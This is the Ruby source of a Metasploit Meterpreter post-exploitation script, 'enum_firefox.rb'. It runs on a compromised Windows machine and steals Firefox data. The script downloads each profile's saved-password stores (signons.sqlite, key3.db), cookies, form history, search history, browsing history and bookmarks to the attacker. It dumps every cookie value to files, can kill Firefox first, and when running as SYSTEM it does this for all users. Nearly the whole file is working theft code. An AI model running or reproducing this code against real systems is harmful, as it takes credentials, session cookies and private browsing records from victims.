# # $Id: enum_firefox.rb 9770 2010-07-10 20:00:32Z darkoperator $ # $Revision: $ # Author: Carlos Perez at carlos_perez[at]darkoperator.com #------------------------------------------------------------------------------- ################## Variable Declarations ################## require 'sqlite3' @client = client kill_frfx = false host,port = session.session_host, session.session_port # Create Filename info to be appended to downloaded files filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") # Create a directory for the logs @logs = ::File.join(Msf::Config.config_directory, 'logs',"scripts", 'enum_firefox', host + filenameinfo ) # logfile name logfile = @logs + "/" + host + filenameinfo + ".txt" notusrs = [ "Default", "Default User", "Public", "LocalService", "NetworkService", "All Users" ] #------------------------------------------------------------------------------- #Function for getting Firefox SQLite DB's def frfxplacesget(path,usrnm) # Create the log ::FileUtils.mkdir_p(@logs) @client.fs.dir.foreach(path) {|x| next if x =~ /^(\.|\.\.)$/ fullpath = path + '\\' + x if @client.fs.file.stat(fullpath).directory? frfxplacesget(fullpath,usrnm) elsif fullpath =~ /(formhistory.sqlite|cookies.sqlite|places.sqlite|search.sqlite)/i dst = x dst = @logs + ::File::Separator + usrnm + dst print_status("\tDownloading Firefox Database file #{x} to '#{dst}'") @client.fs.file.download_file(dst, fullpath) end } end #------------------------------------------------------------------------------- #Function for processing the Firefox sqlite DB's def frfxdmp(usrnm) sitesvisited = [] dnldsmade = [] bkmrks = [] cookies = [] formvals = '' searches = '' results = '' placesdb = @logs + ::File::Separator + usrnm + "places.sqlite" formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite" searchdb = @logs + ::File::Separator + usrnm + "search.sqlite" cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite" bookmarks = @logs + ::File::Separator + usrnm + "_bookmarks.txt" download_list = @logs + ::File::Separator + usrnm + "_download_list.txt" url_history = @logs + ::File::Separator + usrnm + "_history.txt" form_history = @logs + ::File::Separator + usrnm + "_form_history.txt" search_history = @logs + ::File::Separator + usrnm + "_search_history.txt" begin print_status("\tGetting Firefox Bookmarks for #{usrnm}") db = SQLite3::Database.new(placesdb) #print_status("\tProcessing #{placesdb}") db.execute('select a.url from moz_places a, moz_bookmarks b, '+ 'moz_bookmarks_roots c where a.id=b.fk and parent=2'+ ' and folder_id=2 and a.hidden=0') do |row| bkmrks << row end print_status("\tSaving to #{bookmarks}") if bkmrks.length != 0 bkmrks.each do |b| file_local_write(bookmarks,"\t#{b.to_s}\n") end else print_status("\tIt appears that there are no bookmarks for this account") end rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end #-------------------------------------------------------------------------- begin print_status("\tGetting list of Downloads using Firefox made by #{usrnm}") db.execute('SELECT url FROM moz_places, moz_historyvisits ' + 'WHERE moz_places.id = moz_historyvisits.place_id '+ 'AND visit_type = "7" ORDER by visit_date') do |row| dnldsmade << row end print_status("\tSaving Download list to #{download_list}") if dnldsmade.length != 0 dnldsmade.each do |d| file_local_write(download_list,"\t#{d.to_s} \n") end else print_status("\tIt appears that downloads where cleared for this account") end rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end #-------------------------------------------------------------------------- begin print_status("\tGetting Firefox URL History for #{usrnm}") db.execute('SELECT DISTINCT url FROM moz_places, moz_historyvisits ' + 'WHERE moz_places.id = moz_historyvisits.place_id ' + 'AND visit_type = "1" ORDER by visit_date' ) do |row| sitesvisited << row end print_status("\tSaving URL History to #{url_history}") if sitesvisited.length != 0 sitesvisited.each do |s| file_local_write(url_history,"\t#{s.to_s}\n") end else print_status("\tIt appears that Browser History has been cleared") end db.close rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end #-------------------------------------------------------------------------- begin print_status("\tGetting Firefox Form History for #{usrnm}") db = SQLite3::Database.new(formdb) #print_status("\tProcessing #{formdb}") db.execute("SELECT fieldname,value FROM moz_formhistory") do |row| formvals << "\tField: #{row[0]} Value: #{row[1]}\n" end print_status("\tSaving Firefox Form History to #{form_history}") if formvals.length != 0 file_local_write(form_history,formvals) else print_status("\tIt appears that Form History has been cleared") end db.close rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end begin print_status("\tGetting Firefox Search History for #{usrnm}") db = SQLite3::Database.new(searchdb) #print_status("\tProcessing #{searchdb}") db.execute("SELECT name,value FROM engine_data") do |row| searches << "\tField: #{row[0]} Value: #{row[1]}\n" end print_status("\tSaving Firefox Search History to #{search_history}") if searches.length != 0 file_local_write(search_history,searches) else print_status("\tIt appears that Search History has been cleared") end db.close rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end # Create Directory for dumping Firefox cookies ckfldr = ::File.join(@logs,"firefoxcookies_#{usrnm}") ::FileUtils.mkdir_p(ckfldr) db = SQLite3::Database.new(cookiesdb) db.results_as_hash = true print_status("\tGetting Firefox Cookies for #{usrnm}") db.execute("SELECT * FROM moz_cookies;" ) do |item| fd = ::File.new(ckfldr + ::File::Separator + item['id'].to_s + "_" + item['host'].to_s + ".txt", "w+") fd.puts "Name: " + item['name'] + "\n" fd.puts "Value: " + item['value'].to_s + "\n" fd.puts "Host: " + item['host'] + "\n" fd.puts "Path: " + item['path'] + "\n" fd.puts "Expiry: " + item['expiry'].to_s + "\n" fd.puts "lastAccessed: " + item['lastAccessed'].to_s + "\n" fd.puts "isSecure: " + item['isSecure'].to_s + "\n" fd.puts "isHttpOnly: " + item['isHttpOnly'].to_s + "\n" fd.close end return results end #------------------------------------------------------------------------------- #Function for getting password files def frfxpswd(path,usrnm) @client.fs.dir.foreach(path) {|x| next if x =~ /^(\.|\.\.)$/ fullpath = path + '\\' + x if @client.fs.file.stat(fullpath).directory? frfxpswd(fullpath,usrnm) elsif fullpath =~ /(cert8.db|signons.sqlite|signons3.txt|key3.db)/i begin dst = x dst = @logs + ::File::Separator + usrnm + dst print_status("\tDownloading Firefox Password file to '#{dst}'") @client.fs.file.download_file(dst, fullpath) rescue print_error("\t******Failed to download file #{x}******") print_error("\t******Browser could be running******") end end } end #------------------------------------------------------------------------------- # Function for checking if Firefox is installed def frfxchk found = false registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall").each do |a| if a =~ /Firefox/ print_status("Firefox was found on this system.") found = true end end return found end #------------------------------------------------------------------------------- #Function for executing all pilfering actions for Firefox def frfxpilfer(frfoxdbloc,session,logs,usrnm,logfile) print_status("Getting Firefox information for user #{usrnm}") frfxplacesget(frfoxdbloc,usrnm) frfxpswd(frfoxdbloc,usrnm) file_local_write(logfile,frfxdmp(usrnm)) end # Function to kill Firefox if open def kill_firefox print_status("Killing the Firefox Process if open...") @client.sys.process.get_processes().each do |x| if x['name'].downcase == "firefox.exe" print_status("\tFirefox Process found #{x['name']} #{x['pid']}") print_status("\tKilling process .....") session.sys.process.kill(x['pid']) end end end ####################### Options ########################### @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu." ], "-k" => [ false, "Kill Firefox processes before downloading databases for enumeration."] ) @@exec_opts.parse(args) { |opt, idx, val| case opt when "-h" print_line "Meterpreter Script for extracting Firefox Browser." print_line(@@exec_opts.usage) raise Rex::Script::Completed when "-k" kill_frfx = true end } if client.platform =~ /win32|win64/ if frfxchk user = @client.sys.config.getuid if not is_system? usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%")) db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles" if kill_frfx kill_firefox end print_status("Extracting Firefox data for user #{usrname}") frfxpswd(db_path,usrname) frfxplacesget(db_path,usrname) frfxdmp(usrname) else registry_enumkeys("HKU").each do |sid| if sid =~ /S-1-5-21-\d*-\d*-\d*-\d{4}$/ key_base = "HKU\\#{sid}" usrname = Rex::FileUtils.clean_path(registry_getvaldata("#{key_base}\\Volatile Environment","USERNAME")) db_path = registry_getvaldata("#{key_base}\\Volatile Environment","APPDATA") + "\\Mozilla\\Firefox\\Profiles" if kill_frfx kill_firefox end print_status("Extracting Firefox data for user #{usrname}") frfxpswd(db_path,usrname) frfxplacesget(db_path,usrname) frfxdmp(usrname) end end end end else print_error("This version of Meterpreter is not supported with this Script!") raise Rex::Script::Completed end